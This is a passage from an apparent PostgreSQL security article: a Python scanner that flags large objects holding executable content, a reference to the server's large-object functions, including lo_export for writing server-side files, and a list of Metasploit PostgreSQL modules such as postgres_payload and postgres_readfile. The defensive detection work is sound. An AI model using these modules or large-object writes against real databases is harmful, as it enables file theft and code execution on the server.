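            size = len(page.data)
            is_last = idx == len(pages) - 1
            if size > LOBLKSIZE:
                # The server itself rejects this on read ("invalid data field size").
                findings.append(LoFinding(loid, "oversize-page",
                                          f"page {page.pageno} holds {size} bytes, limit {LOBLKSIZE}"))
            elif size != LOBLKSIZE and not is_last:
                # Sequential writes fill every page but the last; a short page in
                # the middle points at direct INSERTs into the catalog.
                findings.append(LoFinding(loid, "short-page",
                                          f"page {page.pageno} holds {size} bytes, not {LOBLKSIZE}"))
        head = pages[0].data if pages[0].pageno == 0 else b""
        for magic, label in EXECUTABLE_MAGIC:
            if head.startswith(magic):
                findings.append(LoFinding(loid, "executable-content", label))
                break
    return findings


def suspicious_loids(rows: Sequence[LoRow]) -> List[int]:
    """OIDs whose content looks executable; the ones to preserve as evidence."""
    return sorted({f.loid for f in scan_large_objects(rows) if f.kind == "executable-content"})


def _padded(prefix: bytes, size: int) -> bytes:
    return (prefix + b"\x00" * size)[:size]


# Constructed rows: loid 9023 has the layout the upload above produces (full 2 KB
# pages, short final page, ELF header); loid 4242 is a JPEG whose pages were
# inserted by hand, leaving a short middle page and a missing page 1.
SAMPLE_ROWS = [
    LoRow(9023, 0, _padded(b"\x7fELF\x02\x01\x01\x00", LOBLKSIZE)),
    LoRow(9023, 1, b"\x00" * LOBLKSIZE),
    LoRow(9023, 2, b"\x00" * 112),
    LoRow(4242, 0, _padded(b"\xff\xd8\xff\xe0", 1000)),
    LoRow(4242, 2, b"\x00" * 50),
]

if __name__ == "__main__":
    for f in scan_large_objects(SAMPLE_ROWS):
        print(f"loid {f.loid}: {f.kind} ({f.detail})")
```

Pair the scan with pg_largeobject_metadata, which records each object's owner: an executable owned by the web application's database role is a much stronger signal than one owned by a backup role that legitimately stores blobs.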

lo_create() creates a new large object and returns its oid.

lo_export(oid loid, text filename)
Exports the data of large object loid into the server-side file filename; returns the exported length (integer).

lo_unlink(oid loid)
Deletes the large object loid; returns an integer, 1 on success, -1 on failure.

lo_open(oid loid, integer open_mode)
Opens the large object loid for reading or writing. open_mode is the open type: inv_write (write, value 131072), inv_read (read, value 262144) or inv_write|inv_read (read/write, value 393216). Returns a file descriptor fd (integer); a negative fd means failure.

loread(integer fd, integer len)
Reads len bytes starting at the current position of descriptor fd; returns the data (bytea).

lowrite(integer fd, bytea buf)
Writes the binary data buf into the large object starting at the current position of fd; returns the number of bytes written (integer).

lo_lseek(integer fd, integer offset, integer whence)
Changes the current read/write position of fd. whence is the seek mode: seek_set (0) from the start of the object, seek_cur (1) from the current position, seek_end (2) from the end of the object; offset is the displacement. Returns the new position (integer), -1 on error.
Note: loread and lowrite advance the current position automatically, so for sequential reads and writes lo_lseek is rarely needed.

lo_tell(integer fd)
Returns the current position of fd (integer).

lo_truncate(integer fd, integer len)
Truncates the large object open on fd to len bytes. If len exceeds the object's current length, the object is extended with '\0' bytes. Returns 0 on success, negative on failure.

lo_close(integer fd)
Closes fd; returns 0 on success, negative on failure.

All of the functions above that take an fd must be used within a single transaction: the descriptor fd is only valid inside one transaction and is closed automatically when the transaction ends.

Metasploit PostgreSQL modules

use auxiliary/admin/postgres/postgres_readfile
use auxiliary/admin/postgres/postgres_sql
use auxiliary/scanner/postgres/postgres_dbname_flag_injection
use auxiliary/scanner/postgres/postgres_login
use auxiliary/scanner/postgres/postgres_version
use auxiliary/server/capture/postgresql
use exploit/linux/postgres/postgres_payload
use exploit/windows/postgres/postgres_payload

References

PostgreSQL database exploitation methods

Using PostgreSQL to get a shell during penetration testing - JF's blog
